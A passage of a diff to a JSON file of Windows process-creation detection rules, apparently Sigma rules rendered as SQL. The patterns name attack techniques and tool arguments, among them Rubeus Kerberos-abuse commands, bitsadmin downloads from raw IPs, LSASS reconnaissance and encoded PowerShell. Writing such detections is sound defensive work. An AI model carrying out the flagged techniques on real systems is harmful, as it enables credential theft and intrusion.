"attack.t1036.005" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + 
"attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_exploit_cve_2017_0261.yml" }, { - "title": "Windows Share Mount Via Net.EXE", - "id": "f117933c-980c-4f78-b384-e3d838111165", + "title": "Suspicious SysAidServer Child", + "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", "status": "experimental", - "description": "Detects when a share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate activity by administrators and scripts" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID 
= '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_use_mount_share.yml" + "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", - "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate software creating script event consumers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" }, { - "title": "Suspicious VBoxDrvInst.exe Parameters", - "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", - "status": "test", - "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", - "author": "Konstantin Grishchenko, oscd.community", + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' 
ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "title": "New Process Created Via Wmic.EXE", + "id": "526be59f-a573-4eea-b5f7-f0973207634d", "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects new process creation using WMIC via the \"process call create\" flag", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_wmic_process_creation.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the 
execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential RDP Session Hijacking Activity", + "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "status": "experimental", + "description": "Detects potential RDP Session Hijacking activity on Windows systems", + "author": "@juju4", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Administrative activity" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" }, { - "title": "Potential Russian APT Credential Theft 
Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Rundll32 Activity", + "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine 
LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine 
LIKE '%.cpl\",' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_rundll32_susp_activity.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", - "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", - "author": "Florian Roth (Nextron Systems)", + "title": "Certificate Exported Via Certutil.EXE", + "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", + "status": "test", + "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "There legitimate reasons to export certificates. 
Investigate the activity to determine if it's benign" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_certutil_export_pfx.yml" }, { - "title": "Suspicious High IntegrityLevel Conhost Legacy Option", - "id": "3037d961-21e9-4732-b27a-637bcc7bf539", - "status": "experimental", - "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. 
High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", - "author": "frack113", + "title": "Permission Check Via Accesschk.EXE", + "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "status": "test", + "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Very Likely, including launching cmd.exe via Run As Administrator" + "System administrator Usage" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'High' AND CommandLine LIKE '%conhost.exe%' ESCAPE '\\' AND CommandLine LIKE '%0xffffffff%' ESCAPE '\\' AND CommandLine LIKE '%-ForceV1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_conhost_legacy_option.yml" + "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - 
"description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.t1562" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Git Clone", + "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", + "status": "experimental", + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" + "attack.reconnaissance", + "attack.t1593.003" ], 
"falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": "proc_creation_win_git_susp_clone.yml" }, { - "title": "PUA - Mouse Lock Execution", - "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "title": "Verclsid.exe Runs COM Object", + "id": "d06be4b9-8045-428b-a567-740a26d9db25", "status": "test", - "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both 
credential access and collection in security incidents.", - "author": "Cian Heasley", + "description": "Detects when verclsid.exe is used to run COM object via GUID", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate uses of Mouse Lock software" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_mouselock_execution.yml" + "filename": "proc_creation_win_verclsid_runs_com.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", - "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", + "status": "experimental", + "description": "Detects the use of SDelete to erase a file not the free space", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentProcessName LIKE 
'%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "WinDbg/CDB LOLBIN Usage", - "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", - "status": "test", - "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", + "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", - "attack.t1218", - "attack.t1127" + "attack.t1218" ], "falsepositives": [ - "Legitimate use of debugging tools" + "App-V clients" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_cdb.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" }, { 
- "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", - "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "status": "experimental", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine 